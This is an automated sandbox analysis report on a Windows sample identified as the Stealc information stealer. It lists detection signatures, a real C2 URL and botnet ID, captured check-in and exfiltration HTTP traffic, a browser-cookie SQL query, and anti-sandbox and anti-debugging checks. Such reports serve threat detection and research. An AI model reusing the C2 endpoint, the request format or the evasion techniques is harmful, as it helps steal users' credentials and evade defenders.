Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1522760
MD5:e9912f8bbba8a435c0770c5cb9dbdee2
SHA1:f323b850b002137ec47f291d928378245d4670fe
SHA256:f53185e3b9046b1c522d14dfed5988e0b4096cd5302e13a0d3e77207e014d797
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7640 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E9912F8BBBA8A435C0770C5CB9DBDEE2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1371291825.0000000005000000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1413525563.000000000116E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7640JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7640JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.4b0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-30T16:32:04.742514+020020442431Malware Command and Control Activity Detected192.168.2.949706185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.4b0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 42%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004BC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_004BC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004B7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_004B7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004B9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_004B9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004B9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_004B9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_004C8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004C38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004C4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004BDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_004BDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004BE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_004BE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_004C4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004BED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_004BED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004BBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_004BBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004BDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004BDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004B16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004B16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_004C3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004BF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004BF6B0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.9:49706 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDHJEBFBFHJECAKFCAAKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 37 37 43 45 30 30 32 37 30 43 35 33 35 32 38 30 30 33 31 39 37 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 2d 2d 0d 0a Data Ascii: ------HDHJEBFBFHJECAKFCAAKContent-Disposition: form-data; name="hwid"477CE00270C53528003197------HDHJEBFBFHJECAKFCAAKContent-Disposition: form-data; name="build"doma------HDHJEBFBFHJECAKFCAAK--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004B4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004B4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDHJEBFBFHJECAKFCAAKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 37 37 43 45 30 30 32 37 30 43 35 33 35 32 38 30 30 33 31 39 37 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 2d 2d 0d 0a Data Ascii: ------HDHJEBFBFHJECAKFCAAKContent-Disposition: form-data; name="hwid"477CE00270C53528003197------HDHJEBFBFHJECAKFCAAKContent-Disposition: form-data; name="build"doma------HDHJEBFBFHJECAKFCAAK--
                Source: file.exe, 00000000.00000002.1413525563.000000000116E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1413525563.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php5
                Source: file.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php;
                Source: file.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpX
                Source: file.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpg
                Source: file.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpu
                Source: file.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087E1190_2_0087E119
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084430B0_2_0084430B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00877C8F0_2_00877C8F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008884A60_2_008884A6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0072C4310_2_0072C431
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087FC410_2_0087FC41
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007794BA0_2_007794BA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0078E5D10_2_0078E5D1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007255AD0_2_007255AD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071CE540_2_0071CE54
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00878EBB0_2_00878EBB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008226C10_2_008226C1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087C6F20_2_0087C6F2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00884E440_2_00884E44
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00889FB20_2_00889FB2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00886FC10_2_00886FC1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088EF2B0_2_0088EF2B
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 004B45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: ceyxbmwp ZLIB complexity 0.9950204483489852
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: file.exe, 00000000.00000003.1371291825.0000000005000000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_004C9600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_004C3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\MZA1Y3YR.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exe, 00000000.00000002.1413525563.000000000116E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies;^
                Source: file.exeReversingLabs: Detection: 42%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1846272 > 1048576
                Source: file.exeStatic PE information: Raw size of ceyxbmwp is bigger than: 0x100000 < 0x19ca00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.4b0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ceyxbmwp:EW;arpaejxu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ceyxbmwp:EW;arpaejxu:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004C9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cfcb1 should be: 0x1d10d0
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: ceyxbmwp
                Source: file.exeStatic PE information: section name: arpaejxu
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00906887 push 61066066h; mov dword ptr [esp], eax0_2_009068AD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00721056 push 6A6A4725h; mov dword ptr [esp], edx0_2_00721093
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0092E8A6 push eax; mov dword ptr [esp], ecx0_2_0092E8E8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B540F8 push 093545A5h; mov dword ptr [esp], edx0_2_00B54117
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B540F8 push edi; mov dword ptr [esp], 2D7EBB27h0_2_00B54130
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B540F8 push ebp; mov dword ptr [esp], edx0_2_00B54149
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B540F8 push 4BEB144Ah; mov dword ptr [esp], ecx0_2_00B54160
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093F0CA push 19D5B468h; mov dword ptr [esp], ecx0_2_0093F0F5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009760F6 push 7FB3F711h; mov dword ptr [esp], eax0_2_00976124
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009760F6 push edi; mov dword ptr [esp], 1109440Eh0_2_00976260
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CB035 push ecx; ret 0_2_004CB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090A017 push edi; mov dword ptr [esp], 3963AA91h0_2_0090A027
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090A017 push edx; mov dword ptr [esp], ecx0_2_0090A08B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B7806 push eax; mov dword ptr [esp], 7BBED7DAh0_2_008B7832
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B7806 push ebx; mov dword ptr [esp], 76FF3F43h0_2_008B784F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007188C6 push edi; mov dword ptr [esp], ebp0_2_0071583B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007188C6 push ecx; mov dword ptr [esp], 19F8AA5Ah0_2_00717D26
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007188C6 push ecx; mov dword ptr [esp], 7BD344F1h0_2_00718CA6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093385D push edx; mov dword ptr [esp], ecx0_2_00933884
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093385D push eax; mov dword ptr [esp], 1F7E48F7h0_2_0093389D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A6047 push ecx; mov dword ptr [esp], 2FFC19B1h0_2_009A605C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D073 push eax; mov dword ptr [esp], 7066FDF2h0_2_0091D09F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D073 push 10224B75h; mov dword ptr [esp], ebp0_2_0091D0D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D073 push 1D3406A5h; mov dword ptr [esp], esp0_2_0091D136
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D073 push eax; mov dword ptr [esp], 3CB72057h0_2_0091D16D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094087D push 01DBC351h; mov dword ptr [esp], esi0_2_00940B91
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095E860 push 0D5D38E2h; mov dword ptr [esp], eax0_2_0095E899
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00984062 push ebp; mov dword ptr [esp], eax0_2_00984756
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00984062 push 46E3323Ah; mov dword ptr [esp], eax0_2_00984765
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00984062 push ebp; mov dword ptr [esp], ecx0_2_0098476B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B541A6 push edx; mov dword ptr [esp], 66602EE7h0_2_00B541A7
                Source: file.exeStatic PE information: section name: ceyxbmwp entropy: 7.955340871068763

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004C9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13668
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712147 second address: 71214D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D034 second address: 88D039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 895B23 second address: 895B32 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5E987E4116h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 895B32 second address: 895B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 895B38 second address: 895B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5E987E4116h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 895B45 second address: 895B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 895C76 second address: 895C94 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F5E987E4123h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
